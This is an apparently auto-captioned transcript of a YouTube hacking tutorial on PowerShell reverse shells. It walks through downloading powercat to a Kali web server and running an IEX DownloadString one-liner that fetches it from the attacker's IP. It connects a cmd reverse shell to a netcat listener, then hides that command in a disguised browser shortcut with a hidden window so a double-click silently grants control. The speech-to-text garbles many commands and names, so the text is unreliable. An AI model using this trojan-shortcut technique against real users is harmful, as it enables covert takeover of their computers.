PowerShell Hacking

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

great power comes great responsibility and today we'll be learning about powershell hacking [Music] so here's what we're learning today so within a computer we have a windows machine here and after which we have something called powershell so for powershell it allows us a lot of ability to be able to run scripts automation that you can write out easily just like what you have possibly in your linux system like a bash script so this gives us the power to run all sorts of instructions and one of those things we want to do is do powershell hacking which is to give us what we call reverse shell or even possibly simply something that can give us access directly into the target system say through a buy shell and with that once we have that executed this gives us full control of the entire computer and this is really crazy and what we want to do next is to target say something like an icon and the icon will give us the ability to inject powershell scripts within it and then after which leading us to the ability to take control of the entire computer again now what you want to do is put on your black hat and after which let's go so right in front of us we're going to win this computer and what you can do is you can go to the bottom left enter powershell hit enter on that and that's it done right now inside powershell windows powershell like we can write our script execute commands directly against the target computer so right here running powershell and let's say you want to create a new file all you got to do is to enter the following instructions here so you can enter say for example new dash item format dash path and now what we want to do is specify where we want to place the file so in this case we can do a dot slash and it followed by say new file.txt okay and followed by say for example dash item type and then let's call this the file item type enter on that done so now we have created new file right here so if i minimize this i go to the left side and see a new file has now been created otherwise you can do the same for files photos to delete them remove them to be able to modify them so all of those options are available for you in powershell so here i am on our hacker's machine call linux your favorite operating system so what i can do now is i can enter sudo systemcdl all right followed by the following and say start apogee2 okay dot service hit enter on that enter your password enter that's it done all right so we managed to start up our web server okay and the status we can see here we have the apigee web server running all right our http server running now that we've started our web server what we can do now is to go ahead and download a file any file alright so to demonstrate it we're able to get those file so what i can do here is i can go into enter following so i can enter the bluegate all right followed by say http 192.168.0.192. so this is the call linux ip address and info by slash say d4.ps1 so this is for powershell script and then we can have it out file where we want to place the file all right so in this case i can say c all right for my users followed by desktop and then say in this case default.ps1 and then we hit enter on that and boom done the file has now been downloaded so if i go over into desktop i can see right here we have again the ability to download that file and if i do a refresh and i see right here we have the default file right there all right so i can do a right click i can look at properties and we can see the following information all right so we managed to download the file over here so we modified it on 12 41am now to take things to the next level we want to have a reverse shell we want to gain command execution in the target server so what we can do is we can do a wget https alright so what we want to do now is target some of these available scripts that we can use so that we can get a reverse shell in target machine so we can go to github user content slash all right say bessie morgino all right followed by slash and we use powercat all right so powercat is going to give us the ability to run just that to give us our reverse shell all right so once you really hit enter on that and now we've downloaded the file and all i got to do now is to move this file copy this file over into var.html so let's go ahead and do a copy all right follow powercat.ps1 into var www.html powercad.ps hit enter on that done so now we are hosting a malicious file in call linux so that we can host it and serve it to any of our target computers now moving back into the windows computer what i can do here is i can do a powershell all right.exe and what we want to do now is to be able to download that file all right so here i can do the following right c right and we can do an iex okay so we are trying to download the object okay i'm creating a new object from here so let's go ahead and enter that all right so dot download string all right followed by http 192.168.0.192 followed by slash all right powercad dot ps1 okay and then we can close this off and then after which we can go ahead and have this downloaded and we can also execute it by doing a semicolon so once we have semicolon what we can do here is to execute the file that we just downloaded so all you got to do now is go ahead and enter say powercat all right followed by c which is a listener that we want to connect to so in this case 192.168.0.1.2 followed by that part so let's go in and give it a part of one two three seven all right and then followed by dash e cmd so we want to target the cmd executable so before we hit enter on this go back to kyle linux and what we want to do now is host our listener so you can enter say nc followed by nvlp followed by one two three seven support number hit enter on that and now we're listening i hit enter in three two one and now i jump back to column you can see right here boom we are in bottom left side uses loy liang young and one of these things we can do very quickly right now is say for example i do echo or a cd into say desktop and i do an echo all right maybe i say you have been hacked [Music] by mr hacker lloyd all right and i i'll put this into a file maybe it's a hack.txt i hit enter on that done now we have created file and i can enter notepad and we open up this hack.txt i hit enter on that and then if i go back into the windows computer right now you can see right here you see the pop-up you have been hacked by mr hackaloy now what we are truly trying to achieve is not to throw this script straight into the user's computer but to make it available as a shortcut file this is the trick this is the really exciting part so if you see right here i have the following i have a chromium copy which is shortcut file as you can see here i can do a right click on this and we can see the properties of some really interesting target that we have okay so if you see right here i have the following i have a target okay i'm going to close the whole of this with changing up the target of the shortcut file right now so i'll show you exactly what's going on so with that i can enter powershell exe okay and with the powershell.exe what we can do next is to use this to execute the instruction that we have earlier all right so this is exactly the same thing that we use when we were typing out that instruction in powershell now if you see right here the phone target so with powershell.exe and exact same command with enter alright so we are creating a new object all right we're downloading the string over here now we have 192.168.0.182 which is the call linux box and then after which we run powercad all right so in this case we have a target ip address in the port and we are going to execute on cmd all right so you click apply and you can see right here it automatically fuses in for us a target of powershell.exe all right so it's under c windows system32 windows powershell version one powershell.exe you click ok on this i go back over to call linux all right i'm going to go ahead and close off all right this specific i'm going to close off this specific netcat listener that we have i enter a new one and now i go back over to windows computer and i double click onto this shortcut file i double clicked on it and then if i go back over into call linux you can see right here we now again have the connection to the target computer so it's game over now obviously this pop-up looks very suspicious so we can hide it so let me show you how you can high just that so what we can do here is powershell.exe i enter dash wh all right so this will hide the window i click apply i click ok i go back to call linux all right and now what i can do is i can do a clear and we can set up our listener once more i go back to the windows computer i double click on this and boom that's it it's game over go back over to column x and here we have it we have a hidden reverse shell running right here right now so once again i hope you learned something available in today's story and i'm going to like share subscribe and turn on notifications so that you can be kept abreast of the latest ethical hacking and penetration testing tutorial

Info

Channel: Loi Liang Yang

Views: 70,481

Rating: undefined out of 5

Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp, powershell

Id: ZIzViKPEFIw

Channel Id: undefined

Length: 8min 41sec (521 seconds)

Published: Tue Sep 20 2022